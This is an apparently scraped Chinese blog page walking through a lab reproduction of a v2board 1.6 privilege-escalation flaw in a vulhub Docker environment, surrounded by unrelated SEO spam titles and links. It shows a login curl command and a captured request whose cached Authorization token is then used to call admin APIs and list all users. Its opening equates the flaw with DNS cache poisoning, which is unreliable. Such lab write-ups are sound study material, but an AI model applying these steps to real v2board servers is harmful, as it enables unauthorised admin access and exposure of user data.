当前位置: 首页 > news >正文

没有公司 接单做网站保利建设开发总公司网站

没有公司 接单做网站,保利建设开发总公司网站,成都营销网站制作,做网页价格1.什么是缓存投毒 缓存投毒(Cache poisoning),通常也称为域名系统投毒(domain name system poisoning),或DNS缓存投毒(DNS cache poisoning)。它是利用虚假Internet地址替换掉域名系…

1.什么是缓存投毒

缓存投毒(Cache poisoning),通常也称为域名系统投毒(domain name system poisoning),或DNS缓存投毒(DNS cache poisoning)。它是利用虚假Internet地址替换掉域名系统表中的地址,进而制造破坏。当网络用户在带有该虚假地址的页面中进行搜寻,以访问某链接时,网页浏览器由于受到该虚假条目的影响而打开了不同的网页链接。在这种情况下,蠕虫、木马、浏览器劫持等恶意软件就可能会被下载到本地用户的电脑上。

                                                                                                                                                        ------百度

 关于v2board的相关漏洞信息和文件在此链接https://github.com/vulhub/vulhub/tree/master/v2board/1.6-privilege-escalation

2.复现漏洞

1.首先 建立一个目录,复制以下两个脚本文件

 

2. 建立完成后,利用docker创建复现环境

docker compose up -d

下载完成后输入IP地址加端口号即可看见登录界面

 

3.自行注册一个账号

然后,将电子邮件和密码替换为您自己的数据并登录:

curl -i -s -k -XPOST --data-binary "email=123@123.com&password=12345678"http://localhost:9090/api/v1/passport/auth/login

得到如下auth_data码

 4.打开bp抓包,将带有auth_data码的request包放入其中

GET /api/v1/user/info HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Authorization: ZXhhbXBsZUBleGFtcGxlLmNvbTokMnkkMTAkMVJpUFplR2RnZlFPSVRyWEM4dW0udW5QZVZNTGs3RlFFbkFVVnBwbEhmTlMyczdQaEpTa3E=
Cache-Control: max-age=0

即可得出该用户的信息

此步骤是让服务器将您的授权保存到 Redis 缓存。

最后,可以简单地使用此授权调用所有管理员 API,例如 http://your-ip:8080/api/v1/admin/user/fetch:

我们利用管理员的api将所有用户信息一一列出,漏洞复现大功告成!!!

 

http://www.yayakq.cn/news/464959/

相关文章:

  • 学校做网站及费用手机网站 html
  • 软件介绍下载网站建设什么职位做网站
  • 网站建设shzanen预订网站模板
  • 龙泉建设局网站关于网站开发制作的相关科技杂志的网站
  • 你认为优酷该网站哪些地方可以做的更好_为什么?西安引流推广公司
  • 无锡优化网站费用上饶做网站要多少钱
  • 腾讯wordpress郑州粒米seo外包
  • 企业网站建设方案seo关键词优化怎么做
  • 目前网站软件国外网站页头设计图片
  • 天津网站制作套餐医疗网络营销外包
  • 帮人做网站赚钱青岛网站建设方案外包
  • 工程建设的招标在哪个招标网站wordpress安装空白页
  • 网站建设结构徐水区住房和城乡建设局网站
  • 烟台商机互联做网站吗免费活动策划方案的网站
  • 做ios试玩推广网站丽江市网站建设制作
  • 1688货源网官方网站入口蓝色风格网站
  • 网站 报价单阿里云宝塔安装wordpress
  • 网上接单 网站建设饿了么网站怎么做的
  • 网站百度不收录东莞网约车租车公司
  • 重新建设网站的请示网站打开有声音是怎么做的
  • 贵阳网站建设建站解决方案如何帮人做网站
  • iframe 网站前台模板英文都不懂 学网站建设维护难吗
  • 电脑无法登录建设银行网站网页背景图片素材
  • 网站底部备案号wordpress在线查看word插件
  • 台州智能模板建站软件定制开发网站
  • wordpress文字不适应手机seo优化网站源码
  • 网站做的像会侵权吗竞价托管优化公司
  • 用手机可以做网站吗河南建设类资格审核网官网
  • 网站备份挖掘wordpress系统架构图
  • 东莞网站推广哪家好信息医院做网站的风格